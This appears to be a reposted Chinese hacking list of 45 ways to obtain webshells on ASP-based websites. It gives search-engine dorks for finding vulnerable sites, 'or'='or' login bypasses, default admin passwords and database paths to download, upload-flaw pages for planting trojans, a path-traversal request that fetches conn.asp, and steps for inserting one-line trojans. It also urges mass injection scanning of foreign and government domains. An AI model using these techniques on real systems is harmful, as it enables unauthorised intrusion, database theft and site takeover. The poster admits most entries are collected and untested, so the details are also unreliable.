45种可以获得Webshell的程序[转]

1:到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库! 
2,到Google ,site:cq.cn inurl:asp
3, 利用挖掘鸡和一个ASP木马. 
文件名是login.asp 
......
路径组是/manage/ 
关键词是went.asp 
用'or'='or'来登陆
4,这个应该N多人都搞过吧 。。
关键字:Co Net MIB Ver 1.0网站后台管理系统
帐号密码为 'or'='or'
5.动感购物系统 呵呵。想到了明小子
inurl:help.asp登陆,如未注册成为会员!
upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞 
6。默认数据库地址blogdata/acblog.asa 
关键字:acblog
7. 百度 /htdocs 
注册里可以直接上传asa文件!
8. /Database/#newasp.mdb 
关键词:NewAsp SiteManageSystem Version
9. 用挖掘机 
关键字:Powered by WEBBOY 
页面:/upfile.asp
10. baidu中搜索关键字Ver5.0 Build 0519 
(存在上传漏洞)
11. Upfile_Article.asp bbs/upfile.asp 
输入关键字:powered by mypower ,
应该是动什么上传漏洞来着?用的人也比较多 
工具明小子 挖掘鸡就可以了
12. inurl:winnt\system32\inetsrv\
在google里面输入这个就可以找到很多网站
13. 现在GOOGLE搜索关键字 intitle:网站小助手 inurl:asp
14. 关键字: 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采 装备购买 站内流言 友情连接 本站论坛
挖掘鸡的关键字 添 setup.asp
15. VBulletin论坛的数据库 
默认数据库地址! 
/includes/functions.php 
工具: 
1.网站猎手 下载地址:百度 Google! 
2.Google 
关键字: 
Powered by: vBulletin Version 3.0.1 
Powered by: vBulletin Version 3.0.2 
Powered by: vBulletin Version 3.0.3 
其中一个就可以了
16
1.打开百度或GOOGLE搜索,输入powered by comersus ASP shopping cart 
open source。 
这是一个商场系统。 
2.网站的最底部分,有个 Comersus Open Technologies LC。打开看下~~comersus系统~ 
猜到,comersus.mdb. 是数据库名 
数据库都是放在database/ 后的, 
所以database/comersus.mdb 
comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。 
那样把前一个''store/''除去,再加上database/comersus.mdb 试试 
都是默认数据库地址

17.无忧传奇官方站点程序。 
1、后台管理地址:http://您的域名/msmiradmin/ 
或者是 http://您的域名/admin.asp 
2、默认后台管理帐号:msmir 
3、默认后台管理密码:msmirmsmir 或 msmir 
数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb 
或者是 http://您的域名/msmirdata/msmirArticle.asa
数据库连接文件为 ***********/Conn.asp
也是默认数据库地址。 现在传奇4F好多都是这个。呵呵我刚还没事搞了个呢`
18. 百度里输入/skins/default/  
19.利用挖掘机 
关键机:power by Discuz 
路径:/wish.php 
配合: 
Discuz!论坛 wish.php远程包含漏洞 
......
20. 上传漏洞. 
工具 : 当然还是明小子了 
网站猎手 或者挖掘鸡了。 
关键字powered by mypower 
检测的页面或文件插入upfile_photo.asp 
这个用的人也N多。。
21.新云漏洞 
这个漏洞ACCESS和SQL版通吃。 
Google搜索关键字 "关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 管理录" 
把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp 
以源码,软件等下载站居多。 
大家时常碰到数据库如果前面或者中间+了# 可以用%23替换就可以下载了 
\database\%23newasp.mdb 
如:#xzws.mdb 改成%23xzws.mdb 


收集的。没试过。。。 - -!
22. 通吃所有商城+动力上传系统
使用工具:挖掘鸡 v1.1 明小子 
商城入侵: 
关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成 
漏洞页面:upload.asp 
upfile_flash.asp
还是上传漏洞拿webshell
23. 注射漏洞 
百度搜索ioj's blog
24 动易 
列目录 
admin_articlerecyclebin.asp 
inurl:admin_articlerecyclebin.asp
25. 
工具:网站猎手 
关键词:inurl:Went.asp 
后缀:manage/login.asp 
口令:'or'='or'
这软件还不是太熟悉。 - -
26. 
入侵魔兽私服 
需要的工具:ASP木马 - -!废话了。 
明小子 
关键字:All Right Reserved Design:游戏联盟 
后台地址:admin/login.asp 
数据库的地址:chngame/#chngame.mdb
都默认的。数据库闹下来自己解密吧不多说了。
27. 
漏洞是利用管理员iis设置的失误 
用baidu 关键字就是比较罕见的脚本名 
动网: ReloadForumCache.asp 
Leadbbs: makealltopanc.asp 
BBSXP: admin_fso.asp 
动易: admin_articlerecyclebin.asp
好像比较少吧不太清楚了这个。。
28. 
国外站的爆库漏洞 
关键字:sad Raven's Guestbook 
密码地址:/passwd.dat 
后台地址:/admin.php
29. 
Discuz 4.1.0跨站漏洞 
利用工具:1,WAP浏览器 
2,WAP编码转换器 
关键字:"intextiscuz! 4.1.0"
WAP浏览器..............................!!
30. 
关键字:尚奈克斯 
后台路径/system/manage.asp 
直接传ASP木马
挖掘机去。。 - -!
31. 
工具 
1:网站猎手 
2:大马 
关键字:切勿关闭Cookies功能,否则您将不能登录 
插入diy.asp
32. 
关键字:Team5 Studio All rights reserved 
默认数据库:data/team.mdb
剩下的自己搞。不多说了
33. 
工具: 挖掘机 辅臣数据库读取器 
关键字: 企业简介 产品展示 产品列表 
后缀添加: /database/myszw.mdb 
后台地址: admin/Login.asp 
都默认的。一样。数据库闹下来自己解密码去 。就行了。。 - -
34. 
关键子 XXX inurl:Nclass.asp 
......
在"系统设置"里写个木马。 
会被保存到 在 config.asp内。

35. 
不进后台照样拿动网WEBSHELL 
data.asp?action=BackupData 动网数据库备份默认路径
没试过。。。不知道。
36. 
工具:网站猎手 WebShell 
关键字:inurl:Went.asp 
后缀:manage/login.asp 
弱口令:'or'='or'
也没试过。 。。。。。。

37. 
关键字owered byCDN_NEWS 
随便扫遍文章加一个' ,来试探注入点 
后台地址:admin_index.asp 
用啥工具我就不说了吧。。。。。。。。。

38. 
入侵雷池新闻发布系统 
关键字:leichinews 
去掉leichinews后面的. 
打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp 
再上传马..... 
进访问uppic anran.asp 登陆马.
---- 
没试过。汗 ,收集来的。

39. 
工具挖掘机就行了。 
关键字ower System Of Article Management Ver 3.0 Build 20030628 
默认数据库:database\yiuwekdsodksldfslwifds.mdb 
后台地址:自己扫描! 
工具明小子。- -!怎么又是他啊。 
MD5自己解......... 
(NND这个一扫一大堆。大家可以去试试。。)

40. 
一、通过GOOGLE搜索找大量注入点 
关键字:asp?id=1 gov.jp/ asp?id= 
页数:100 
语言:想入侵哪个国家就填什么语言吧
42 
关键字:Powered by:94KKBBS 2005 
利用密码找回功能 找回admin 
提问:ddddd 回答:ddddd
42. 
关键字:inurl:Went.asp 
后台为manage/login.asp 
后台密码: 'or'=' 或者 'or''=''or' 登录 进入 
默认数据库地址atabase/DataShop.mdb
43. 
关键字:****** inurl:readnews.asp 
把最后一个/改成%5c ,直接暴库,看密码,进后台 
随便添加个新闻 在标题输入我们的一句话木马

44. 
工具:一句话木马 
BBsXp 5.0 sp1 管理员猜解器 
关键词:powered by bbsxp5.00 
进后台,备份一句话马!
45. 
关键字:程序核心:BJXSHOP网上开店专家 
后台:/admin

你可能感兴趣的:(hacking)